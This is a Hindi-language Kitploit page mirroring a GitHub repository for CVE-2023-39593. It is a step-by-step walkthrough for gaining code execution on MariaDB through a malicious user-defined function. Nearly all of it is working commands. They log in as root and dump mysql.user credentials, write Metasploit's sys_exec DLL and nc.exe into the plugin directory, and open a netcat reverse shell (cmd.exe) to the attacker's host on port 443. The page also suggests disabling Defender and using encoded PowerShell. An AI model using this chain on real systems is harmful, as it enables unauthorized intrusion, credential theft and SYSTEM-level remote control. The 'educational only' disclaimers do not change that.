Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-39593 — Database authenticated code execution | Kitploit
उपकरण/GitHubGitHub/ant1sec-ops/cve-2023-39593
Privilege EscalationExploitationPost-ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload DevelopmentDatabase Security
GitHubant1sec-ops/cve-2023-39593

CVE-2023-39593

Database authenticated code execution

21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

MariaDB 10.5 प्रमाणित कोड निष्पादन - sys_exec

यह मार्गदर्शिका दूरस्थ सर्वर पर MariaDB में User-Defined Function (UDF) भेद्यता का शोषण करने के विस्तृत निर्देश प्रदान करती है। इन चरणों में एक असुरक्षित डेटाबेस सिस्टम पर दुर्भावनापूर्ण कोड डाउनलोड करना और निष्पादित करना शामिल है।

चेतावनी: यह दस्तावेज़ केवल शैक्षिक उद्देश्यों के लिए है। इन तकनीकों का अनधिकृत उपयोग अवैध और अनैतिक है।

हमले को दोहराने के चरण

1. MariaDB रिमोट होस्ट से कनेक्ट करें

MySQL सर्वर से कनेक्ट करने के लिए निम्न कमांड का उपयोग करें:

root@kitploit:~
mysql -h 192.168.214.129 -u root -pPassw0rd!

2. MariaDB संस्करण जांचें

चल रहे MySQL के संस्करण का पता लगाने के लिए, निष्पादित करें:

root@kitploit:~
select @@version;

3. सभी उपयोगकर्ताओं की सूची बनाएं

वर्तमान में लॉग इन उपयोगकर्ता को देखने के लिए:

root@kitploit:~
select user();

4. रूट उपयोगकर्ता के बारे में सभी जानकारी डंप करें

रूट उपयोगकर्ता से संबंधित सभी विवरण प्राप्त करें:

root@kitploit:~
select * from mysql.user where user='root';

5. उपयोगकर्ता विशेषाधिकार जांचें

निर्धारित करें कि वर्तमान उपयोगकर्ता के पास क्या विशेषाधिकार हैं:

root@kitploit:~
show grants;

6. सिस्टम की आर्किटेक्चर जांचें

निर्धारित करें कि सिस्टम आर्किटेक्चर UDF के लिए असुरक्षित है या नहीं:

root@kitploit:~
select @@version_compile_os, @@version_compile_machine;

7. प्लगइन निर्देशिका जांचें

प्लगइन निर्देशिका की पहचान करें जहां UDF फ़ाइलें अपलोड की जा सकती हैं:

root@kitploit:~
select @@plugin_dir;

8. 32-बिट DLL कॉपी करें

Metasploit के एक्सप्लॉइट निर्देशिका से 32-बिट DLL कॉपी करें:

root@kitploit:~
ls /usr/share/metasploit-framework/data/exploits/mysql/
cp /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll udf.dll

9. DLL को Base64 प्रारूप में बदलें

udf.dll फ़ाइल को base64 प्रारूप में एनकोड करें:

root@kitploit:~
cat udf.dll | base64 | tr -d '\n' > udf.base64

10. DLL को MySQL सर्वर पर स्थानांतरित करें

udf.base64 से base64 मान कॉपी करें और इसे MySQL सर्वर में स्थानांतरित करें:

udf.base64 को टेक्स्ट एडिटर में खोलें:

root@kitploit:~
leafpad udf.base64

MariaDB में, चलाएँ:

root@kitploit:~
select from_base64("base64 value") into dumpfile 'C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\udf.dll';

वैकल्पिक रूप से, यदि आवश्यक हो तो निम्न पथ का उपयोग करें:

root@kitploit:~
C:\Program Files\MariaDB 11.1\lib\plugin\

11. MariaDB में UDF फ़ंक्शन लोड करें

एक नया फ़ंक्शन बनाने के लिए MariaDB में निम्न कमांड निष्पादित करें:

root@kitploit:~
create function sys_exec returns int soname 'udf.dll';

नोट: आप sys_eval, sys_get, do_system, या sys_bineval का भी उपयोग कर सकते हैं। सुनिश्चित करें कि आप int का उपयोग करें, into का नहीं।

12. UDF इंस्टॉलेशन सत्यापित करें

जांचें कि UDF फ़ंक्शन सफलतापूर्वक स्थापित हुआ या नहीं:

root@kitploit:~
select * from mysql.func;

13. Netcat बाइनरी तैयार करें

Netcat निष्पादनयोग्य को अपनी स्थानीय निर्देशिका में कॉपी करें और इसे base64 में एनकोड करें:

root@kitploit:~
cp /usr/share/windows-binaries/nc.exe .
cat nc.exe | base64 | tr -d '\n' > nc.base64

14. Netcat को MariaDB सर्वर पर स्थानांतरित करें

nc.base64 को टेक्स्ट एडिटर में खोलें:

root@kitploit:~
leafpad nc.base64

फिर, MySQL में:

root@kitploit:~
select from_base64("base64valueofNc.exe") into dumpfile 'C:\\Program Files\\MariaDB 10.5\\lib\\plugin\\nc.exe';

वैकल्पिक रूप से, आप इसे सीधे अपलोड कर सकते हैं:

root@kitploit:~
mysql -u root -p -h 192.168.214.129 < nc.base64

15. रिवर्स शेल के लिए Netcat निष्पादित करें

पोर्ट 443 पर Netcat लिसनर चालू करें:

root@kitploit:~
sudo nc -nlvp 443

रिमोट सर्वर पर रिवर्स शेल के लिए Netcat निष्पादित करें:

root@kitploit:~
select sys_exec('C:\\Program Files\\MariaDB 10.4\\lib\\plugin\\nc.exe 192.168.214.128 443 -e cmd.exe');

नोट: यह चरण Windows Defender या अन्य एंटीवायरस सॉफ़्टवेयर द्वारा अवरुद्ध हो सकता है। PowerShell एन्कोडेड कमांड (powershellbase64) का उपयोग करने पर विचार करें और सुनिश्चित करें कि Defender बंद है।

16. PowerShell कमांड निष्पादित करें

base64 एन्कोडिंग का उपयोग करके PowerShell कमांड निष्पादित करें:

root@kitploit:~
select sys_exec('powershellbase64');

नोट: कई मामलों में आप NT AUTHORITY SYSTEM विशेषाधिकार प्राप्त कर सकते हैं।

अतिरिक्त जानकारी

  • फ़ंक्शन हटाएँ: किसी भी बनाए गए UDF फ़ंक्शन को हटाने के लिए:

    root@kitploit:~
    drop function sys_get;
    
  • स्थानीय इनफाइल जांचें: जांचें कि स्थानीय लेखन सक्षम है या नहीं:

    root@kitploit:~
    show variables like 'local_infile';
    
  • सम्मिलित विशेषाधिकार वाले उपयोगकर्ता खोजें: पहचानें कि किन उपयोगकर्ताओं के पास सम्मिलित विशेषाधिकार है:

    root@kitploit:~
    use mysql;
    select user from user where insert_priv='Y' and Host='%';
    

अस्वीकरण: यह दस्तावेज़ केवल शैक्षिक उद्देश्यों और सुरक्षा अनुसंधान के लिए है। इस जानकारी का दुरुपयोग आपराधिक आरोपों और गंभीर कानूनी दंड का कारण बन सकता है। किसी भी नेटवर्क या सिस्टम पर भेद्यता का परीक्षण करने से पहले हमेशा संबंधित अधिकारियों से अनुमति प्राप्त करें।

टूल डाउनलोड करें